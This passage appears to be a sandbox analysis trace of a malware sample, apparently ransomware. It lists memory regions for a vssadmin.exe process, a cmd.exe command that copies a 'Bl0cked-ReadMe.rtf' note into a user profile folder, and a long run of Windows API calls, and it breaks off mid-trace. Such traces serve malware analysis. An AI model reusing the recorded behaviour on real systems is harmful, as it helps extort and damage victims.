0x960000 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\System32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe") Region: id = 30714 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30715 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30716 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30717 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30718 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30731 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30732 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30733 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30734 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 30735 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 30736 start_va = 0x70370000 end_va = 0x7037ffff entry_point = 0x70370000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 30737 start_va = 0x70380000 end_va = 0x70495fff entry_point = 0x70380000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 30738 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 30739 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30740 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30741 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30742 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 30743 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30744 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30745 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30746 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30747 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 30748 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30749 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30750 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30751 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30752 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 30753 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30754 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30755 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30756 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 30757 start_va = 0xe0000 end_va = 0xecfff entry_point = 0xe0000 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssadmin.exe.mui") Region: id = 30758 start_va = 0x130000 end_va = 0x130fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 30759 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 30760 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 30761 start_va = 0x980000 end_va = 0x157ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 30762 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 30763 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 30764 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 30765 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 30766 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 30767 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 30768 start_va = 0x5f0000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 30769 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 30770 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 30771 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 30772 start_va = 0x630000 end_va = 0x8fefff entry_point = 0x630000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 30773 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Thread: id = 702 os_tid = 0x9c4 Thread: id = 703 os_tid = 0x130 Thread: id = 704 os_tid = 0xd98 Thread: id = 705 os_tid = 0x80c Thread: id = 706 os_tid = 0x7f4 Process: id = "506" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x234" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30784 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30785 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30786 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30787 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 30788 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30789 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30790 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30791 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30792 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 30793 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30828 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30829 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30830 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30831 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 30832 start_va = 0x390000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 30833 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30834 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30835 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30836 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30837 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30838 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30839 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30840 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30841 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30842 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 30843 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30844 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30845 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 30846 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 30847 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 30848 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 30849 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 30850 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 30851 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 708 os_tid = 0x42c [0208.862] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fbe4 | out: lpSystemTimeAsFileTime=0x16fbe4*(dwLowDateTime=0xb14e6a80, dwHighDateTime=0x1d440a9)) [0208.862] GetCurrentProcessId () returned 0x234 [0208.862] GetCurrentThreadId () returned 0x42c [0208.862] GetTickCount () returned 0x3ab3c [0208.862] QueryPerformanceCounter (in: lpPerformanceCount=0x16fbdc | out: lpPerformanceCount=0x16fbdc*=26565156037) returned 1 [0208.863] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0208.863] __set_app_type (_Type=0x1) [0208.863] __p__fmode () returned 0x76b331f4 [0208.863] __p__commode () returned 0x76b331fc [0208.863] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0208.863] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0208.863] GetCurrentThreadId () returned 0x42c [0208.863] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x42c) returned 0x38 [0208.863] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0208.863] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0208.863] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.864] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0208.864] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fb74 | out: phkResult=0x16fb74*=0x0) returned 0x2 [0208.864] VirtualQuery (in: lpAddress=0x16fbab, lpBuffer=0x16fb44, dwLength=0x1c | out: lpBuffer=0x16fb44*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0208.864] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16fb44, dwLength=0x1c | out: lpBuffer=0x16fb44*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0208.864] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16fb44, dwLength=0x1c | out: lpBuffer=0x16fb44*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0208.864] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16fb44, dwLength=0x1c | out: lpBuffer=0x16fb44*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0208.864] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16fb44, dwLength=0x1c | out: lpBuffer=0x16fb44*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0208.864] GetConsoleOutputCP () returned 0x1b5 [0208.864] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0208.864] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0208.864] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.864] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0208.864] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.864] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0208.864] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.864] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0208.865] _get_osfhandle (_FileHandle=0) returned 0x3 [0208.865] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0208.865] _get_osfhandle (_FileHandle=0) returned 0x3 [0208.865] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0208.865] GetEnvironmentStringsW () returned 0x1f0168* [0208.865] FreeEnvironmentStringsW (penv=0x1f0168) returned 1 [0208.865] GetEnvironmentStringsW () returned 0x1f0168* [0208.865] FreeEnvironmentStringsW (penv=0x1f0168) returned 1 [0208.865] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eae4 | out: phkResult=0x16eae4*=0x40) returned 0x0 [0208.865] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x0, lpData=0x16eaf0*=0x90, lpcbData=0x16eae8*=0x1000) returned 0x2 [0208.865] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x1, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.865] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x0, lpData=0x16eaf0*=0x1, lpcbData=0x16eae8*=0x1000) returned 0x2 [0208.865] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x0, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x40, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x40, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x0, lpData=0x16eaf0*=0x40, lpcbData=0x16eae8*=0x1000) returned 0x2 [0208.866] RegCloseKey (hKey=0x40) returned 0x0 [0208.866] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eae4 | out: phkResult=0x16eae4*=0x40) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x0, lpData=0x16eaf0*=0x40, lpcbData=0x16eae8*=0x1000) returned 0x2 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x1, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x0, lpData=0x16eaf0*=0x1, lpcbData=0x16eae8*=0x1000) returned 0x2 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x0, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x9, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x4, lpData=0x16eaf0*=0x9, lpcbData=0x16eae8*=0x4) returned 0x0 [0208.866] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eaec, lpData=0x16eaf0, lpcbData=0x16eae8*=0x1000 | out: lpType=0x16eaec*=0x0, lpData=0x16eaf0*=0x9, lpcbData=0x16eae8*=0x1000) returned 0x2 [0208.866] RegCloseKey (hKey=0x40) returned 0x0 [0208.866] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863aa [0208.866] srand (_Seed=0x5b8863aa) [0208.866] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf\"" [0208.866] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf\"" [0208.866] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.866] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1f18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0208.867] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0208.867] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.867] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0208.867] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0208.867] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0208.867] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0208.867] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0208.867] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0208.867] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0208.867] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0208.867] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0208.867] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0208.867] GetEnvironmentStringsW () returned 0x1f22b8* [0208.867] FreeEnvironmentStringsW (penv=0x1f22b8) returned 1 [0208.867] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.867] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0208.867] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0208.867] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0208.867] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0208.867] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0208.867] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0208.867] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0208.867] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0208.867] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0208.867] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f8b0 | out: 